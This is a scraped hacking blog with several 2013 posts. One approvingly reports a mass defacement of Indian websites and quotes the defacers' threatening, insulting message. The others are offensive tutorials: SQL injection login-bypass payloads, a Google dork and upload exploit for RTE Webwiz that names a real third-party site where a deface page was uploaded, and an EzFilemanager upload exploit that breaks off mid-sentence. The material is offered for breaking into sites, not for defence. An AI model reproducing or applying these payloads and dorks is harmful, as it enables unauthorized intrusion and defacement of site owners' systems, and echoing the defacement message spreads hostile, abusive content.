Beat Dev

More than 20,000 Indian websites hacked and defaced by Pak Cyber Experts

<i style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxm04sBFsEOXsNaGSGhTb4_JMVc5C7aBjFYT33N5TXn1NFsoQ7xYmubYppgePnWi5yg7fyaSeCpNwuGsg9ym0zT9QBCOnCFQYw_Y0ikjzfWMxirRCdp1qA3C5LlxVfKoV1BFyDgJfL3yY/s640/Untitled.png" /></i><br /><i style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></i><i style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></i><i style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;">Hackers going with the <span class="IL_AD" id="IL_AD10" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static; text-decoration: underline !important;">handle</span> | Muhammad Bilal | Dr@cul@ | XeEk a.k.a v1rus 4u | iMMi hAx0r | V1rus Attacker | hacked and defaced more than 20,000 <span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static; text-decoration: underline !important;">Indian websites</span>.</i><br /><i style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><b style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></b></i><span style="background-color: white; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px;"></span><i style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><b style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Hacked websites were showing a deface page similar to the above screenshot, with <span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static; text-decoration: underline !important;">a short</span>message:</b></i><br /><br /><div style="background-color: white; border: 0px; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="color: #555555;">G</span><span style="color: red;">ooD Morning IndianZzZZ ! Hello Admin and Welcome Admin To Your Site</span></i></div><div style="background-color: white; border: 0px; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="color: red;">We Are;- | Muhammad Bilal | Dr@cul@ | XeEk a.k.a v1rus 4u | iMMi hAx0r | V1rus Attacker |</span></i></div><div style="background-color: white; border: 0px; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="color: red;">Friends:- | Let Deepak |Haxor786 | Mr.V!ru$007 | Khiladi786 | Code Injector | Kai H4x0r | Iluminador | M4RK M4N |MaDdY ZeOx |No-Code | You Knowho | Xero Ex | Backdoor Spider | Dr-Silent | Danger Bhai | Muhammad Sajawal Younas | pk~Shadow | Nasir Ali | <span class="IL_AD" id="IL_AD12" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static; text-decoration: underline !important;">Tool Kit</span>|Gondrong | Sabu Haxor | King Hax0r | Hunt3r Khan | Hax0r Husnain | Rais Aks | Usama Ejaz |</span></i></div><div style="background-color: white; border: 0px; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Spacial Greats:- | Evil-Dz | Mirza Jahanzaib | Shadow008 | Ch3rn0by1 | Sh3ll Haxor | MadCode |</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">You Must Have Heard About US on News , Headlines , Governament charges , Blogs , online news media , etc etc,</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">This is a Payback from Pak Cyber Experts in return to the defacements of Pakistani websites ! You are playing with fire !</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">This is NOT a game kids We are <span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static; text-decoration: underline !important;">Warning</span> you one last time, dont think that you are secure in this !</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">we will take Revenge ! if Any Pakistani Sites gets Hacked by Indians Dear gay hind stop Abusing Islam !</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Stop Defacing Bengladeshi & Pakistani Sites Otherwise we will crush Your cyber space !</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">i hope you all know about us we silent but when we start no buddy can stop us !</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Already proved check google more about us you n00bs are nothing just a bunch of n00bs This is A Pay back From Our Side of Hacking Pakistani Sites.. Backoff Lamers from our cyber space..</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Everybody Knows whose cyber space is more vulnerable</i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">.: You will hack 1 we will hack thousands :. </i></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;"><span style="color: blue;"><br /></span></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">List of hacked websites can be seen from the paste provided below:</i></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.pastebin.ca/2459507" style="-webkit-transition: color 0.2s; border: 0px; color: black; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: color 0.2s; vertical-align: baseline;">http://www.pastebin.ca/2459507</a></i></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></div><div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;"><i style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">At the time of writing the Article most of the websites were still showing the deface page.</i></div>

More than 20,000 Indian websites hacked and defaced by Pak Cyber Experts

01 Oct 2013

THA (The Hackers Army) official website got hacked !!

<div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><a href="http://lh5.ggpht.com/-yDc_CDvQ7Dk/Txb2kSqJydI/AAAAAAAAABU/4iQTBEmyqlU/s1600/Capture%25255B3%25255D.png" imageanchor="1"><img alt="[Capture%255B3%255D.png]" border="0" height="180" src="http://lh5.ggpht.com/-yDc_CDvQ7Dk/Txb2kSqJydI/AAAAAAAAABU/4iQTBEmyqlU/s400/Capture%25255B3%25255D.png" width="400" /></a></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif;"><span style="background-color: white;"><b><br /></b></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><span style="background-color: white;"><b>Haxroot have posted the snapshot of the comments !!</b></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><span style="background-color: white;"><b><br /></b></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><span style="background-color: white;"><b>you can see the hacked website and mirror here</b></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><span style="background-color: white;"><b><br /></b></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><span style="background-color: white;"><b>website : <a href="http://www.thehackersarmy.net/" style="color: #6c0e11; text-decoration: none;">http://www.thehackersarmy.net/</a></b></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><b><br /></b></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; text-align: center;"><strong style="background-color: white;">mirror : <a href="http://www.zone-hack.com/defacements/?id=39294" style="color: #6c0e11; text-decoration: none;">http://www.zone-hack.com/defacements/?id=39294</a></strong></div><div style="text-align: center;"><br /></div>

THA (The Hackers Army) official website got hacked !!

Haxroot have posted the snapshot of the comments !!you can see the hacked website and mirror herewebsite : http://www.thehackersarmy.net/mirror : http://www.zone-hack.com/defacements/?id=39294…

07 Sep 2013

How to hack website using sql injection

<div style="font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><span class="Apple-style-span" style="font-family: 'Trebuchet MS', sans-serif;">SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its called the coding standard loop hole. some website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. Now assume , you opened a website and went to his Sign in or log in page. Now in username field you have entered something say </span><span style="color: blue;"><span class="Apple-style-span" style="font-family: 'Trebuchet MS', sans-serif;">yogesh</span></span><span class="Apple-style-span" style="font-family: 'Trebuchet MS', sans-serif;"> and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called </span><b style="color: red;"><span class="Apple-style-span" style="font-family: 'Trebuchet MS', sans-serif;">Blind SQL</span></b><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;">.<span style="color: black;"> </span></span></span></div><div style="font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">Some basic requirements for sql injection:</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">1) you need a web browser to open URL and to view source codes.</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">2) you need notepad++.</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">3) and very basic  queries of sql like insert , select , update , delete etc.</span></span><br /><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">First of all you can hack those website using SQL injection hacks that allows some input fields from the visitor which can provide input to website like log in page , search page, feedback page etc.</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">Now a days , HTML pages use POST command to send parameter to another ASP/ASPX page.</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">Therefore, you may not see the parameter in the URL. You can check the source code of the HTML, and look for "FROM" tag in the HTML code. You may find something like this in some HTML codes:</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"> </span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"><F O R M action=login.aspx method=post></span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"><I N P UT type=hidden name=user v a l u e=xyz></span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">< / F O R M></span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"><br /></span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;">Everything between the < F O R M > and < / F O R M > parameters(remove space in words) contains the crucial information and can help us to determine things in more detailed way.</span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"><br /></span></span><br /><span style="font-size: x-small;"></span></span><div><span style="background-color: white; font-size: x-small;">There is <b>alternate method for finding vulnerable website</b>, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:</span></div><span style="background-color: white;"><br /><br /><span style="font-size: medium;">http://example.com/login.asp?id=10</span><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"> </span></span><br /><span class="Apple-style-span" style="color: red; font-family: 'Trebuchet MS', sans-serif;"><span style="color: black;"><br /></span></span><br /></span><div><span style="background-color: white; font-size: x-small;">Now how to detect that this URL is vulnerable or not:</span></div><div><span style="background-color: white; font-size: x-small;">Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:</span></div><span style="background-color: white;"><br /></span><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dotted rgb(238, 238, 238); color: red; font-style: italic; line-height: 30px; margin: 4px; padding: 2px; width: 520px;"><span style="background-color: white; font-size: medium;">http://example.com/login.asp?id=hi' or 1=1--</span></blockquote><span style="background-color: white;"><br /><br /><br /></span><div><span style="background-color: white;"><span style="font-size: x-small;">You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:</span> </span><div style="color: red;"><span style="background-color: white; font-size: medium;">< F O R M action=http://example.com/login. asp method=p o s t ><br />< i n p u t  type=hidden name=abc value="hi' or 1=1--"><br />< / F O R M ></span></div><div style="color: #6aa84f;"><span class="Apple-style-span" style="background-color: white; font-size: xx-small;"><br /></span></div></div><div><b><span style="font-weight: normal;"><span class="Apple-style-span" style="background-color: white; font-size: xx-small;"> If your luck is favoring you, you will get the login into the website without any username or password.</span></span></b></div><div><span class="Apple-style-span" style="background-color: white; font-size: xx-small;"><br /></span></div><div><span class="Apple-style-span" style="color: #990000;"><span class="Apple-style-span" style="background-color: white; font-size: xx-small;">                                 <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfVILXf3ugarMuZc8P3Q_wdpb0KupcCZ1m7jRyCKxoZPgrgmeESw3Hx-pTb61iOdlrxZqjfcQyiVzyHzp0WNO2C6fLFgGZXSNldLWTo3LBR_926MU_r75iuzVgnczYm5z4JE-qgU4Q4s/s1600/sql_injection.gif" /></span></span></div><div><span style="background-color: white;"><span style="font-size: medium;"><u><span class="Apple-style-span" style="color: #990000;">But why ' or 1=1-- ?</span></u></span><span class="Apple-style-span" style="font-size: xx-small;"><br /><span style="font-size: x-small;">Take an asp page that will link you to another page with the following URL:</span></span></span></div><div style="color: red;"><span class="Apple-style-span" style="background-color: white; font-size: xx-small;"><br /></span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dotted rgb(238, 238, 238); color: red; font-style: italic; line-height: 30px; margin: 4px; padding: 2px; width: 520px;"><span style="background-color: white; font-size: medium;">http://example.com/search.asp?category=sports</span></blockquote><div><span style="background-color: white; font-size: x-small;">In this URL 'category' is the variable name and 'sports' is it's value.</span></div><div><span style="background-color: white; font-size: x-small;"><br />Here this request fires following query on the database in background.</span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dotted rgb(238, 238, 238); color: red; font-style: italic; line-height: 30px; margin: 4px; padding: 2px; width: 520px;"><span style="background-color: white; font-size: medium;">SELECT * FROM TABLE-NAME WHERE category='sports'</span></blockquote><div><span style="background-color: white; font-size: x-small;">Where <b>'TABLE-NAME'</b> is the name of table which is already present in some database.<br />So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.<br /><br />Now, assume that we change the URL into something like this:</span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dotted rgb(238, 238, 238); color: red; font-style: italic; line-height: 30px; margin: 4px; padding: 2px; width: 520px;"><span style="background-color: white; font-size: medium;">http://example.com/search.asp?category=sports' or 1=1--</span></blockquote><div><span style="background-color: white; font-size: x-small;"><br /></span></div><div><span style="background-color: white;"><span style="font-size: x-small;">Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:</span> <span style="font-size: medium;"><span style="color: red;">SELECT * FROM search WHERE category='sports' or 1=1--'</span></span><span class="Apple-style-span" style="font-size: xx-small;"><br /> </span></span></div><div><span style="background-color: white; font-size: x-small;">The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.<br />A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').<br />Sometimes, it may be possible to replace double dash with single hash "#".<br /><br />However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try</span></div><div style="color: #6aa84f;"><span style="background-color: white;"><span class="Apple-style-span" style="font-size: xx-small;"><br /></span><span style="color: red; font-size: medium;">' or 'a'='a</span></span></div><div><span style="background-color: white;"><b><span class="Apple-style-span" style="font-size: xx-small;"> </span></b><span class="Apple-style-span" style="font-size: xx-small;"><br /><span style="font-size: x-small;">It should return the same result.<br />Depending on the actual SQL query, you may have to try some of these possibilities:</span></span><span style="color: red; font-size: medium;">' or 1=1--<br />" or 1=1--<br />or 1=1--<br />' or 'a'='a<br />" or "a"="a<br />') or ('a'='a<br />'or''='</span><u><span style="color: red;"><span style="font-size: medium;"><i><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></i></span><b><i><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></i></b></span></u></span></div><div></div></div><br />

How to hack website using sql injection

SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(…

07 Sep 2013

HACK WebSites using RTE Webwiz Vulnerability

<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoC0EztRVYIC4QsCmFtbnmffmWcP7wklMv0LYmkNjBA5aOudqheMWCwZAU0Iol8KuHLFmFNz09FWz1UrtuOmxEUranySNFpm69HKva1gPbf3cne6bRzO5dj15n2Ga5voNMYJeUzd_YYM4/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoC0EztRVYIC4QsCmFtbnmffmWcP7wklMv0LYmkNjBA5aOudqheMWCwZAU0Iol8KuHLFmFNz09FWz1UrtuOmxEUranySNFpm69HKva1gPbf3cne6bRzO5dj15n2Ga5voNMYJeUzd_YYM4/s400/Untitled.png" width="400" /></a></div><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b>Dear Readers , Here i am posting another method to hack a website using RTE webwiz Vulnerability. </b></span><br /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b>okay now lets start :) Dork for this  Vulnerability is "inurl:rte/my_documents/my_files" The Exploit is    </b></span><br /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b> site.com/rte/RTE_popup_file_atch.asp     site.com/admin/RTE_popup_file_atch.asp For Example i </b></span><br /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b>found 1 website which is vulnerable to RTE Site:- http://www.billkonigsberg.com Vulnerability  </b></span><br /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b>http://www.billkonigsberg.com/RTE_popup_file_atch.asp Now upload the deface page here and in left </b></span><br /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b>site after upload your page will show I have uploaded my deface page like </b></span><br /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><b>http://www.billkonigsberg.com/my_documents/my_files/46C_Fucked.html </b></span>

HACK WebSites using RTE Webwiz Vulnerability

Dear Readers , Here i am posting another method to hack a website using RTE webwiz Vulnerability. okay now lets start :) Dork for this Vulnerability is "inurl:rte/my_documents/my_files" The Exploit i…

07 Sep 2013

EzFilemanager Deface Upload Vulnerability

<div align="left" style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsuYJBWxLkpPySG-3T_dft2pEpbBPkpjF5NkMmq_gN5Q0vCD2gC8HUrXUHI1nSwspUJE68NMPIWm4rBRg8qqDhO14_ChoytwOGaiBwKif_LdzhgOC8QNb7TeOqq36ipD9SFFCNNXj8HM/s1600-h/Capture%25255B4%25255D.png" style="color: #6c0e11; text-decoration: none;"><img alt="Capture" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgob6sIZUwnKW8QwAfYPcLo8Cfgj-nx1e3X5k_2P4BOVCtwBsT3d8kbqIbCOegHpkPz3dSIEHLJgRe8degZ0iRDetSZLsVxB9OnpS8KGR-V-8po5Mwe0pOCoOuSKcMFCE7bcmrId-hzCJo/?imgmax=800" style="background-image: none; border-style: none; border-width: 0px; display: block; float: none; height: 299px; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px; width: 315px;" title="Capture" /></a>Google dork for EzFilemanager is “ <b>inurl:ezfilemanager/ezfilemanager.php </b>”</span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">(you can modify this dork for getting mor results from Google )</span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><b>Exploit </b>: <a href="http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file" style="color: #6c0e11; text-decoration: none;">http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file</a></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">Go to this url : 